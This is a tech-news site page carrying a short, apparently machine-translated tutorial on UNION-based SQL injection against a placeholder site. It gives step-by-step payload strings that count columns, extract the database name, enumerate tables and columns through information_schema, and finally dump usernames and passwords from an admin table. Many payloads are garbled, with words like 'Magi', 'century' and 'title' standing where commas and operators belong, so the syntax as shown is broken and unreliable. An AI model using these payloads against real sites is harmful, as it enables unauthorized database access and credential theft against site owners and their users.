Add to Favorites | Login | Register
Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

About us Contact us

Sql injection: union federated query

2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

For example, there is a website: www.xxxxx.com/artist.asp?id=2

Id=2 order by 3 is normal id=2 order by 4 is not normal

The total number of fields that order by needs to get is 3.

Id=2 union select 1 union select 2 union select 2 Magi 2 Database () # explode database name id=2 union select 1 Magi 2 database ()

There are some data that will not be displayed in multiple rows after union joint query, so you need to invalidate the previous statement first.

Id=-2 union select 1 id=-2 union select () id=-2 union select 1 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' # known database sqlzhuru, table name (the first table)

An error was reported when you entered select * from admin where id=-2 because id=-2 does not exist.

Of course, you can also use the following sentence, which is equivalent to "id=-2".

Id=2 and 1century 2 union select 1Magic TABLENAMEMagol 3 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' # known database sqlzhuru, table name (first table) id=2 and 1century 2 union select 1 # known database sqlzhuru, table name (first table) id=2 and 1century 2 union select 1 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' limit 1 # known database sqlzhuru, second table

If you get the admin table, continue as follows:

Id=2 and 1 title 2 union select 1 from information_schema.COLUMNS where TABLE_NAME='admin' limit 1 # known admin table 1 # known admin table, two column names id=2 and 1 title 2 union select 1 # known admin table, 3 column names id=2 and 1 minute 2 union select 1 # known admin table, 3 column names id=2 and 1 title 2 admin table 1 # known admin table, 3 column names 1 # known admin table (hexadecimal represents admin table)

If you get the username and password columns under the admin table above, then you can list the data of so-and-so

Id=2 and 1 password 2 union select 1 username union select password from admin

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Tag Search: Data database three statements queries federation next hexadecimal fields total effects website faceted multiple rows vpn macOS Linux MariaDB MySQL Docker Shulou Information Shulou Technology Shulou Tech Info OPPO Reno Redmi Xiaomi NVidia Microsoft Huawei Apple macOS Xiaomi MySQL Linux Huawei NVidia Shulou Tech Info Shulou Information Microsoft Shulou Technology Docker MariaDB Redmi OPPO Reno Apple vpn macOS Xiaomi MySQL Linux Huawei NVidia Shulou Tech Info Shulou Information Microsoft Shulou Technology Docker MariaDB Redmi OPPO Reno Apple vpn

Share To

Related

Network Security

More Network Security >

Latest Network Security More Network Security >

Latest Internet Technology More Internet Technology >

Latest Development More Development >

Latest Database More Database >

Latest Servers More Servers >

Latest Mobile Phone More Mobile Phone >

Latest Android Software More Android Software >

Latest Apple Software More Apple Software >

Latest Computer Software News More Computer Software News >

Latest IT Information More IT Information >

Wechat

About us Contact us Product review car news thenatureplanet

© 2024 shulou.com SLNews company. All rights reserved.

12
Report